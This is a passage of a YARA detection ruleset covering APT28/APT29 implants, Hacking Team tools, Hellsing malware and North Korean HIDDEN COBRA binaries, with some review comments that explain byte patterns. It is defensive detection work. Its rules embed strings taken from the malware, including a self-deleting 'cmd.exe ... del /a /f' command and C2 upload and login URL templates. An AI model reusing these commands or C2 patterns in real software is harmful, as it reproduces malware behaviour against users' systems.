$obf_func = { 8B 45 F8 6A 07 03 C7 33 D2 89 45 E8 8D 47 01 5B 02 4D 0F F7 F3 6A 07 8A 04 32 33 D2 F6 E9 8A C8 8B C7 F7 F3 8A 44 3E FE 02 45 FC 02 0C 32 B2 03 F6 EA 8A D8 8D 47 FF 33 D2 5F F7 F7 02 5D 14 8B 45 E8 8B 7D F4 C0 E3 06 02 1C 32 32 CB 30 08 8B 4D 14 41 47 83 FF 09 89 4D 14 89 7D F4 72 A1 } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_6_v3 { meta: description = "Sednit / EVILTOSS Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $deob_func = { 8D 46 01 02 D1 83 E0 07 8A 04 38 F6 EA 8B D6 83 E2 07 0A 04 3A 33 D2 8A 54 37 FE 03 D3 03 D1 D3 EA 32 C2 8D 56 FF 83 E2 07 8A 1C 3A 8A 14 2E 32 C3 32 D0 41 88 14 2E 46 83 FE 0A 7C ?? } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_6_v4 { meta: description = "Sednit / EVILTOSS Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $ASM = {53 5? 5? [6-15] ff d? 8b ?? b? a0 86 01 00 [7-13] ff d? 
?b [6-10] c0 [0-1] c3} condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_6_v5 { meta: description = "Sednit / EVILTOSS Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { 83 EC 18 8B 4C 24 24 B8 AB AA AA AA F7 E1 8B 44 24 20 53 55 8B EA 8D 14 08 B8 AB AA AA AA 89 54 24 1C F7 E2 56 8B F2 C1 ED 02 8B DD 57 8B 7C 24 38 89 6C 24 1C C1 EE 02 3B DE 89 5C 24 18 89 74 24 20 0F 83 CF 00 00 00 8D 14 5B 8D 44 12 FE 89 44 24 10 3B DD 0F 85 CF 00 00 00 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B CA 83 F9 06 89 4C 24 38 0F 83 86 00 00 00 8A C3 B2 06 F6 EA 8B 54 24 10 88 44 24 30 8B 44 24 2C 8D 71 02 03 D0 89 54 24 14 8B 54 24 10 33 C0 8A 44 37 FE 03 D6 8B D8 8D 46 FF 0F AF DA 33 D2 BD 06 00 00 00 F7 F5 C1 EB 07 8A 04 3A 33 D2 32 D8 8D 46 01 F7 F5 8A 44 24 30 02 C1 8A 0C 3A 33 D2 32 C8 8B C6 F7 F5 8A 04 3A 22 C8 8B 44 24 14 02 D9 8A 0C 30 32 CB 88 0C 30 8B 4C 24 38 41 46 83 FE 08 89 4C 24 38 72 A1 8B 5C 24 18 8B 6C 24 1C 8B 74 24 20 8B 4C 24 10 43 83 C1 06 3B DE 89 4C 24 10 8B 4C 24 34 89 5C 24 18 0F 82 3C FF FF FF 3B DD 75 1A 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B CA EB 0D 33 C9 89 4C 24 38 E9 40 FF FF FF 33 C9 8B 44 24 24 33 D2 BE 06 00 00 00 89 4C 24 38 F7 F6 3B CA 89 54 24 24 0F 83 95 00 00 00 8A C3 B2 06 F6 EA 8D 1C 5B 88 44 24 30 8B 44 24 2C 8D 71 02 D1 E3 89 5C 24 34 8D 54 03 FE 89 54 24 14 EB 04 8B 5C 24 34 33 C0 BD 06 00 00 00 8A 44 3E FE 8B D0 8D 44 1E FE 0F AF D0 C1 EA 07 89 54 24 2C 8D 46 FF 33 D2 BB 06 00 00 00 F7 F3 8B 5C 24 2C 8A 04 3A 33 D2 32 D8 8D 46 01 F7 F5 8A 44 24 30 02 C1 8A 0C 3A 33 D2 32 C8 8B C6 F7 F5 8A 04 3A 22 C8 8B 44 24 14 02 D9 8A 0C 06 32 CB 88 0C 06 8B 4C 24 38 8B 44 24 24 41 46 3B C8 89 4C 24 38 72 8F 5F 5E 5D 5B 83 C4 18 C2 10 00 } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 
0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them
}

// IMPLANT_6_v6: one short function body. Decoded as x86: push 0x2710 (10000);
// call [imm32]; mov eax,[imm32]; push -1; push eax; call [imm32]; xor eax,eax;
// ret. Import targets are wildcarded (??), so the pattern survives relinking;
// the call sequence is consistent with a timed sleep followed by an infinite
// wait on a handle -- confirm against a sample before relying on that reading.
rule IMPLANT_6_v6 {
  meta:
    description = "Sednit / EVILTOSS Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $Init1_fun = {68 10 27 00 00 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 6A FF 50 FF 15 ?? ?? ?? ?? 33 C0 C3}
  condition:
    (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them
}

/* TOO MANY FALSE POSITIVES
rule IMPLANT_6_v7 {
  meta:
    description = "Sednit / EVILTOSS Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = "Init1"
    $OPT1 = "ServiceMain"
    $OPT2 = "netids" nocase wide ascii
    $OPT3 = "netui" nocase wide ascii
    $OPT4 = "svchost.exe" wide ascii
    $OPT5 = "network" nocase wide ascii
  condition:
    (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and $STR1 and 2 of ($OPT*)
}
*/

// IMPLANT_7_v1: two XOR-decode loops. $STR1 is byte-wise (mov al,[edx+ecx+3];
// xor al,bl; movzx; store as 16-bit; inc ecx; cmp ecx,edi; jb). $STR2 is the
// SSE2 variant (movdqu xmm0,[eax+ecx]; pxor xmm0,xmm1; movdqu [ecx+edx],xmm0;
// add ecx,16; cmp ecx,edi; jb). Either loop in an MZ file is a match.
rule IMPLANT_7_v1 {
  meta:
    description = "Implant 7 by APT29"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 8A 44 0A 03 32 C3 0F B6 C0 66 89 04 4E 41 3B CF 72 EE }
    $STR2 = { F3 0F 6F 04 08 66 0F EF C1 F3 0F 7F 04 11 83 C1 10 3B CF 72 EB }
  condition:
    (uint16(0) == 0x5A4D) and ($STR1 or $STR2)
}

// IMPLANT_8_v1: a .NET binary ("mscorlib") carrying the pieces of a Google
// search-result redirect URL (https://www.google.com/url?sa=...&rct=...) as
// UTF-16 literals, i.e. a hard-coded Referer/URL template.
rule IMPLANT_8_v1 {
  meta:
    description = "HAMMERTOSS / HammerDuke Implant by APT29"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $DOTNET = "mscorlib" ascii
    $REF_URL = "https://www.google.com/url?sa=" wide
    $REF_var_1 = "&rct=" wide
    $REF_var_2 = "&q=&esrc=" wide
    $REF_var_3 =
"&source=" wide
    $REF_var_4 = "&cd=" wide
    $REF_var_5 = "&ved=" wide
    $REF_var_6 = "&url=" wide
    $REF_var_7 = "&ei=" wide
    $REF_var_8 = "&usg=" wide
    $REF_var_9 = "&bvm=" wide
    $REF_value_1 = "QFj" wide
    $REF_value_2 = "bv.81" wide
  condition:
    // MZ + "mscorlib" + the URL prefix, any 3 of the 9 parameter fragments, and
    // one of the two literal value tokens. "QFj" / "bv.81" are fixed literals:
    // a sample emitting a different value token will not match.
    (uint16(0) == 0x5A4D) and ($DOTNET) and ($REF_URL) and (3 of ($REF_var*)) and (1 of ($REF_value*))
}

/* TOO MANY FALSE POSITIVES
rule IMPLANT_8_v2 {
  meta:
    description = "HAMMERTOSS / HammerDuke Implant by APT29"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $DOTNET= "mscorlib" ascii
    $XOR = {61 20 AA 00 00 00 61}
  condition:
    (uint16(0) == 0x5A4D) and all of them
}
*/

// IMPLANT_9_v1: three XOR-decode loops that cycle a 4-byte key (the "and 3"
// on the index in $STR2/$STR3: and ecx,3; mov dl,[ecx+...]; xor dl,[...];
// inc; store; cmp; jb). All three must be present.
rule IMPLANT_9_v1 {
  meta:
    description = "Onion Duke Implant by APT29"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 8B 03 8A 54 01 03 32 55 FF 41 88 54 39 FF 3B CE 72 EE }
    $STR2 = { 8B C8 83 E1 03 8A 54 19 08 8B 4D 08 32 54 01 04 40 88 54 38 FF 3B C6 72 E7 }
    $STR3 = { 8B 55 F8 8B C8 83 E1 03 8A 4C 11 08 8B 55 FC 32 0C 10 8B 17 88 4C 02 04 40 3B 06 72 E3 }
  condition:
    // NOTE(review): "or uint16(0)" is a bare integer in boolean position. It is
    // true for any input whose first two bytes are not both zero, so the
    // parenthesised clause is effectively no MZ gate at all and the decision
    // rests on the three loops alone. If only PE carriers are wanted, tighten
    // it to `uint16(0) == 0x5A4D and all of them` (this narrows the rule);
    // otherwise drop the clause so the condition says what it does.
    (uint16(0) == 0x5A4D or uint16(0)) and all of them
}

/* TOO MANY FALSE POSITIVES
rule IMPLANT_10_v1 {
  meta:
    description = "CozyDuke / CozyCar / CozyBear Implant by APT29"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = {33 ?? 83 F2 ?? 81 E2 FF 00 00 00}
    $STR2 = {0F BE 14 01 33 D0 ?? F2 [1-4] 81 E2 FF 00 00 00 66 89 [6] 40 83 F8 ??
72}
  condition:
    uint16(0) == 0x5A4D and ($STR1 or $STR2)
}
*/

// IMPLANT_10_v2: $xor read as x64 is xor al,imm8 / xor ax,cx / inc rcx (in
// 32-bit code the 48 byte would be dec eax). $nop is the canonical 14-byte
// multi-byte NOP (66-prefixed nop dword [rax+rax+0]) that compilers emit for
// alignment, so it is present in a great many x64 binaries and adds little
// specificity: the match effectively rests on $xor.
rule IMPLANT_10_v2 {
  meta:
    description = "CozyDuke / CozyCar / CozyBear Implant by APT29"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $xor = { 34 ?? 66 33 C1 48 FF C1 }
    $nop = { 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00}
  condition:
    uint16(0) == 0x5A4D and $xor and $nop
}

/* Deactivated - Slowing down scanning
rule IMPLANT_11_v12 {
  meta:
    description = "Mini Duke Implant by APT29"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    // The four fragments read $STR4,$STR3,$STR2,$STR1 spell "VirtualProtect".
    $STR1 = {63 74 00 00} // ct
    $STR2 = {72 6F 74 65} // rote
    $STR3 = {75 61 6C 50} // ualP
    $STR4 = {56 69 72 74} // Virt
    $STR5 = { e8 00 00 00 00 }
    $STR6 = { 64 FF 35 00 00 00 00 }
    $STR7 = {D2 C0}
    $STR8 = /\x63\x74\x00\x00.{3,20}\x72\x6F\x74\x65.{3,20}\x75\x61\x6C\x50.{3,20}\x56\x69\x72\x74/
  condition:
    (uint16(0) == 0x5A4D) and #STR5 > 4 and all of them
}

rule IMPLANT_12_v1 {
  meta:
    description = "Cosmic Duke Implant by APT29"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $FUNC = {A1 [3-5] 33 C5 89 [2-3] 56 57 83 [4-6] 64}
  condition:
    (uint16(0) == 0x5A4D) and $FUNC
}
*/

// Unidentified_Malware_Two: a C2 URI path, a PDB path, and two code fragments.
// $my_string_two looks like one RC4 PRGA round (inc i; j += S[i]; swap
// S[i],S[j]; xor output with S[S[i]+S[j]]) -- confirm against a sample.
rule Unidentified_Malware_Two {
  meta:
    description = "Unidentified Implant by APT29"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $my_string_one = "/zapoy/gate.php"
    $my_string_two = { E3 40 FE 45 FD 0F B6 45 FD 0F B6 14 38 88 55 FF 00 55 FC 0F B6 45 FC 8A 14 38 88 55 FE 0F B6 45 FD 88 14 38 0F B6 45 FC 8A 55 FF 88 14 38 8A 55 FF 02 55 FE 8A 14 3A 8B 45 F8 30 14 30 }
    $my_string_three = "S:\\Lidstone\\renewing\\HA\\disable\\In.pdb"
    $my_string_four = { 8B CF 0F AF
CE 8B C6 99 2B C2 8B 55 08 D1 F8 03 C8 8B 45 FC 03 C2 89 45 10 8A 00 2B CB 32 C1 85 DB 74 07 } $my_string_five = "fuckyou1" $my_string_six = "xtool.exe" condition: ($my_string_one and $my_string_two) or ($my_string_three or $my_string_four) or ($my_string_five and $my_string_six) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule bin_ndisk { meta: description = "Hacking Team Disclosure Sample - file ndisk.sys" author = "Florian Roth" reference = "https://www.virustotal.com/en/file/a03a6ed90b89945a992a8c69f716ec3c743fa1d958426f4c50378cca5bef0a01/analysis/1436184181/" date = "2015-07-07" hash = "cf5089752ba51ae827971272a5b761a4ab0acd84" strings: $s1 = "\\Registry\\Machine\\System\\ControlSet00%d\\services\\ndisk.sys" fullword wide $s2 = "\\Registry\\Machine\\System\\ControlSet00%d\\Enum\\Root\\LEGACY_NDISK.SYS" fullword wide $s3 = "\\Driver\\DeepFrz" fullword wide $s4 = "Microsoft Kernel Disk Manager" fullword wide $s5 = "ndisk.sys" fullword wide $s6 = "\\Device\\MSH4DEV1" fullword wide $s7 = "\\DosDevices\\MSH4DEV1" fullword wide $s8 = "built by: WinDDK" fullword wide condition: uint16(0) == 0x5a4d and filesize < 30KB and 6 of them } rule Hackingteam_Elevator_DLL { meta: description = "Hacking Team Disclosure Sample - file elevator.dll" author = "Florian Roth" reference = "http://t.co/EG0qtVcKLh" date = "2015-07-07" hash = "b7ec5d36ca702cc9690ac7279fd4fea28d8bd060" strings: $s1 = "\\sysnative\\CI.dll" fullword ascii $s2 = "setx TOR_CONTROL_PASSWORD" fullword ascii $s3 = "mitmproxy0" fullword ascii $s4 = "\\insert_cert.exe" fullword ascii $s5 = "elevator.dll" fullword ascii $s6 = "CRTDLL.DLL" fullword ascii $s7 = "fail adding cert" fullword ascii $s8 = "DownloadingFile" fullword ascii $s9 = "fail adding cert: %s" fullword ascii $s10 = "InternetOpenA fail" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 1000KB and 6 of them 
} rule HackingTeam_Elevator_EXE { meta: description = "Hacking Team Disclosure Sample - file elevator.exe" author = "Florian Roth" reference = "Hacking Team Disclosure elevator.c" date = "2015-07-07" hash1 = "40a10420b9d49f87527bc0396b19ec29e55e9109e80b52456891243791671c1c" hash2 = "92aec56a859679917dffa44bd4ffeb5a8b2ee2894c689abbbcbe07842ec56b8d" hash = "9261693b67b6e379ad0e57598602712b8508998c0cb012ca23139212ae0009a1" strings: $x1 = "CRTDLL.DLL" fullword ascii $x2 = "\\sysnative\\CI.dll" fullword ascii $x3 = "\\SystemRoot\\system32\\CI.dll" fullword ascii $x4 = "C:\\\\Windows\\\\Sysnative\\\\ntoskrnl.exe" fullword ascii /* PEStudio Blacklist: strings */ $s1 = "[*] traversing processes" fullword ascii /* PEStudio Blacklist: strings */ $s2 = "_getkprocess" fullword ascii /* PEStudio Blacklist: strings */ $s3 = "[*] LoaderConfig %p" fullword ascii /* PEStudio Blacklist: strings */ $s4 = "loader.obj" fullword ascii /* PEStudio Blacklist: strings */ $s5 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3" ascii /* PEStudio Blacklist: strings */ $s6 = "[*] token restore" fullword ascii /* PEStudio Blacklist: strings */ $s7 = "elevator.obj" fullword ascii $s8 = "_getexport" fullword ascii /* PEStudio Blacklist: strings */ condition: uint16(0) == 0x5a4d and filesize < 3000KB and all of ($x*) and 3 of ($s*) } rule RCS_Backdoor { meta: description = "Hacking Team RCS Backdoor" author = "botherder https://github.com/botherder" strings: $filter1 = "$debug3" $filter2 = "$log2" $filter3 = "error2" $debug1 = /\- (C)hecking components/ wide ascii $debug2 = /\- (A)ctivating hiding system/ wide ascii $debug3 = /(f)ully operational/ wide ascii $log1 = /\- Browser activity \(FF\)/ wide ascii $log2 = /\- Browser activity \(IE\)/ wide ascii // Cause false positives. 
//$log3 = /\- About to call init routine at %p/ wide ascii //$log4 = /\- Calling init routine at %p/ wide ascii $error1 = /\[Unable to deploy\]/ wide ascii $error2 = /\[The system is already monitored\]/ wide ascii condition: (2 of ($debug*) or 2 of ($log*) or all of ($error*)) and not any of ($filter*) } rule RCS_Scout { meta: description = "Hacking Team RCS Scout" author = "botherder https://github.com/botherder" strings: $filter1 = "$engine5" $filter2 = "$start4" $filter3 = "$upd2" $filter4 = "$lookma6" $engine1 = /(E)ngine started/ wide ascii $engine2 = /(R)unning in background/ wide ascii $engine3 = /(L)ocking doors/ wide ascii $engine4 = /(R)otors engaged/ wide ascii $engine5 = /(I)\'m going to start it/ wide ascii $start1 = /Starting upgrade\!/ wide ascii $start2 = /(I)\'m going to start the program/ wide ascii $start3 = /(i)s it ok\?/ wide ascii $start4 = /(C)lick to start the program/ wide ascii $upd1 = /(U)pdJob/ wide ascii $upd2 = /(U)pdTimer/ wide ascii $lookma1 = /(O)wning PCI bus/ wide $lookma2 = /(F)ormatting bios/ wide $lookma3 = /(P)lease insert a disk in drive A:/ wide $lookma4 = /(U)pdating CPU microcode/ wide $lookma5 = /(N)ot sure what's happening/ wide $lookma6 = /(L)ook ma, no thread id\! \\\\o\// wide condition: (all of ($engine*) or all of ($start*) or all of ($upd*) or 4 of ($lookma*)) and not any of ($filter*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule apt_hellsing_implantstrings { meta: Author = "Costin Raiu, Kaspersky Lab" Date = "2015-04-07" Description = "detection for Hellsing implants" Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" strings: $mz="MZ" $a1="the file uploaded failed !" $a2="ping 127.0.0.1" $b1="the file downloaded failed !" 
$b2="common.asp" $c="xweber_server.exe" $d="action=" $debugpath1="d:\\Hellsing\\release\\msger\\" nocase $debugpath2="d:\\hellsing\\sys\\xrat\\" nocase $debugpath3="D:\\Hellsing\\release\\exe\\" nocase $debugpath4="d:\\hellsing\\sys\\xkat\\" nocase $debugpath5="e:\\Hellsing\\release\\clare" nocase $debugpath6="e:\\Hellsing\\release\\irene\\" nocase $debugpath7="d:\\hellsing\\sys\\irene\\" nocase $e="msger_server.dll" $f="ServiceMain" condition: ($mz at 0) and (all of ($a*)) or (all of ($b*)) or ($c and $d) or (any of ($debugpath*)) or ($e and $f) and filesize < 500000 } rule apt_hellsing_installer { meta: Author = "Costin Raiu, Kaspersky Lab" Date = "2015-04-07" Description = "detection for Hellsing xweber/msger installers" Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" strings: $mz="MZ" $cmd="cmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\"" $a1="xweber_install_uac.exe" $a2="system32\\cmd.exe" wide $a4="S11SWFOrVwR9UlpWRVZZWAR0U1aoBHFTUl2oU1Y=" $a5="S11SWFOrVwR9dnFTUgRUVlNHWVdXBFpTVgRdUlpWRVZZWARdUqhZVlpFR1kEUVNSXahTVgRaU1YEUVNSXahTVl1SWwRZValdVFFZUqgQBF1SWlZFVllYBFRTVqg=" $a6="7dqm2ODf5N/Y2N/m6+br3dnZpunl44g=" $a7="vd/m7OXd2ai/5u7a59rr7Ki45drcqMPl5t/c5dqIZw==" $a8="vd/m7OXd2ai/usPl5qjY2uXp69nZqO7l2qjf5u7a59rr7Kjf5tzr2u7n6euo4+Xm39zl2qju5dqo4+Xm39zl2t/m7ajr19vf2OPr39rj5eaZmqbs5OSI Njl2tyI" $a9="C:\\Windows\\System32\\sysprep\\sysprep.exe" wide $a10="%SystemRoot%\\system32\\cmd.exe" wide $a11="msger_install.dll" $a12={00 65 78 2E 64 6C 6C 00} condition: ($mz at 0) and ($cmd and (2 of ($a*))) and filesize < 500000 } rule apt_hellsing_proxytool { meta: Author = "Costin Raiu, Kaspersky Lab" Date = "2015-04-07" Description = "detection for Hellsing proxy testing tool" Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" strings: $mz="MZ" $a1="PROXY_INFO: automatic proxy url => %s " $a2="PROXY_INFO: connection type 
=> %d " $a3="PROXY_INFO: proxy server => %s " $a4="PROXY_INFO: bypass list => %s " $a5="InternetQueryOption failed with GetLastError() %d" $a6="D:\\Hellsing\\release\\exe\\exe\\" nocase condition: ($mz at 0) and (2 of ($a*)) and filesize < 300000 } rule apt_hellsing_xkat { meta: Author = "Costin Raiu, Kaspersky Lab" Date = "2015-04-07" Description = "detection for Hellsing xKat tool" Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" strings: $mz="MZ" $a1="\\Dbgv.sys" $a2="XKAT_BIN" $a3="release sys file error." $a4="driver_load error. " $a5="driver_create error." $a6="delete file:%s error." $a7="delete file:%s ok." $a8="kill pid:%d error." $a9="kill pid:%d ok." $a10="-pid-delete" $a11="kill and delete pid:%d error." $a12="kill and delete pid:%d ok." condition: ($mz at 0) and (6 of ($a*)) and filesize < 300000 } rule apt_hellsing_msgertype2 { meta: Author = "Costin Raiu, Kaspersky Lab" Date = "2015-04-07" Description = "detection for Hellsing msger type 2 implants" Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" strings: $mz="MZ" $a1="%s\\system\\%d.txt" $a2="_msger" $a3="http://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%s" $a4="http://%s/data/%s.1000001000" $a5="/lib/common.asp?action=user_upload&file=" $a6="%02X-%02X-%02X-%02X-%02X-%02X" condition: ($mz at 0) and (4 of ($a*)) and filesize < 500000 } rule apt_hellsing_irene { meta: Author = "Costin Raiu, Kaspersky Lab" Date = "2015-04-07" Description = "detection for Hellsing msger irene installer" Reference = "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" strings: $mz="MZ" $a1="\\Drivers\\usbmgr.tmp" wide $a2="\\Drivers\\usbmgr.sys" wide $a3="common_loadDriver CreateFile error! " $a4="common_loadDriver StartService error && GetLastError():%d! 
" $a5="irene" wide $a6="aPLib v0.43 - the smaller the better" condition: ($mz at 0) and (4 of ($a*)) and filesize < 500000 } rule apt_hiddencobra_rsakey { meta: description = "HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure" author = "US-CERT" url = "https://www.us-cert.gov/ncas/alerts/TA17-164A" strings: $rsaKey = {7B 4E 1E A7 E9 3F 36 4C DE F4 F0 99 C4 D9 B7 94 A1 FF F2 97 D3 91 13 9D C0 12 02 E4 4C BB 6C 77 48 EE 6F 4B 9B 53 60 98 45 A5 28 65 8A 0B F8 39 73 D7 1A 44 13 B3 6A BB 61 44 AF 31 47 E7 87 C2 AE 7A A7 2C 3A D9 5C 2E 42 1A A6 78 FE 2C AD ED 39 3F FA D0 AD 3D D9 C5 3D 28 EF 3D 67 B1 E0 68 3F 58 A0 19 27 CC 27 C9 E8 D8 1E 7E EE 91 DD 13 B3 47 EF 57 1A CA FF 9A 60 E0 64 08 AA E2 92 D0} condition: any of them } rule apt_hiddencobra_binaries { meta: description = "HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure" author = "US-CERT" url = "https://www.us-cert.gov/ncas/alerts/TA17-164A" strings: $STR1 = "Wating" wide ascii $STR2 = "Reamin" wide ascii $STR3 = "laptos" wide ascii condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and 2 of them } rule apt_hiddencobra_urlbuilder { meta: description = "HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure" author = "US-CERT" url = "https://www.us-cert.gov/ncas/alerts/TA17-164A" strings: $randomUrlBuilder = { 83 EC 48 53 55 56 57 8B 3D ?? ?? ?? ?? 33 C0 C7 44 24 28 B4 6F 41 00 C7 44 24 2C B0 6F 41 00 C7 44 24 30 AC 6F 41 00 C7 44 24 34 A8 6F 41 00 C7 44 24 38 A4 6F 41 00 C7 44 24 3C A0 6F 41 00 C7 44 24 40 9C 6F 41 00 C7 44 24 44 94 6F 41 00 C7 44 24 48 8C 6F 41 00 C7 44 24 4C 88 6F 41 00 C7 44 24 50 80 6F 41 00 89 44 24 54 C7 44 24 10 7C 6F 41 00 C7 44 24 14 78 6F 41 00 C7 44 24 18 74 6F 41 00 C7 44 24 1C 70 6F 41 00 C7 44 24 20 6C 6F 41 00 89 44 24 24 FF D7 99 B9 0B 00 00 00 F7 F9 8B 74 94 28 BA 9C 6F 41 00 66 8B 06 66 3B 02 74 34 8B FE 83 C9 FF 33 C0 8B 54 24 60 F2 AE 8B 6C 24 5C A1 ?? ?? ?? ?? 
F7 D1 49 89 45 00 8B FE 33 C0 8D 5C 11 05 83 C9 FF 03 DD F2 AE F7 D1 49 8B FE 8B D1 EB 78 FF D7 99 B9 05 00 00 00 8B 6C 24 5C F7 F9 83 C9 FF 33 C0 8B 74 94 10 8B 54 24 60 8B FE F2 AE F7 D1 49 BF 60 6F 41 00 8B D9 83 C9 FF F2 AE F7 D1 8B C2 49 03 C3 8B FE 8D 5C 01 05 8B 0D ?? ?? ?? ?? 89 4D 00 83 C9 FF 33 C0 03 DD F2 AE F7 D1 49 8D 7C 2A 05 8B D1 C1 E9 02 F3 A5 8B CA 83 E1 03 F3 A4 BF 60 6F 41 00 83 C9 FF F2 AE F7 D1 49 BE 60 6F 41 00 8B D1 8B FE 83 C9 FF 33 C0 F2 AE F7 D1 49 8B FB 2B F9 8B CA 8B C1 C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7C 24 60 8D 75 04 57 56 E8 ?? ?? ?? ?? 83 C4 08 C6 04 3E 2E 8B C5 C6 03 00 5F 5E 5D 5B 83 C4 48 C3 } condition: $randomUrlBuilder } rule Malware_Updater { meta: Author="US-CERT Code Analysis Team" Date="2017/08/02" Incident="10132963" MD5_1="8F4FC2E10B6EC15A01E0AF24529040DD" MD5_2="584AC94142F0B7C0DF3D0ADDE6E661ED" Info="Malware may be used to update multiple systems with secondary payloads" super_rule=1 report = "https://www.us-cert.gov/sites/default/files/publications/MAR-10132963.pdf" report = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity" strings: $s0 = { 8A4C040480F15D80C171884C04044083F8107CEC } $s1 = { 8A4D0080F19580E97C884D00454B75F0 } condition: any of them } rule Unauthorized_Proxy_Server_RAT { meta: Author="US-CERT Code Analysis Team" Incident="10135536" MD5_1 = "C74E289AD927E81D2A1A56BC73E394AB" MD5_2 = "2950E3741D7AF69E0CA0C5013ABC4209" Info="Detects Proxy Server RAT" super_rule = 1 report = "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF" report = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity" strings: $s0 = {8A043132C288043125FF00000003C299F73D40404900A14440490003D0413BCF72DE5E5FC3} $s1 = {8A04318844241432C28804318B44241425FF00000003C299F73D40404900A14440490003D0413BCF72D65E5FC3} $s2 = {8A04318844241432C28804318B44241425FF00000003C299F73D5C394100A16039410003D0413BCF72D65E5FC3} $s3 = 
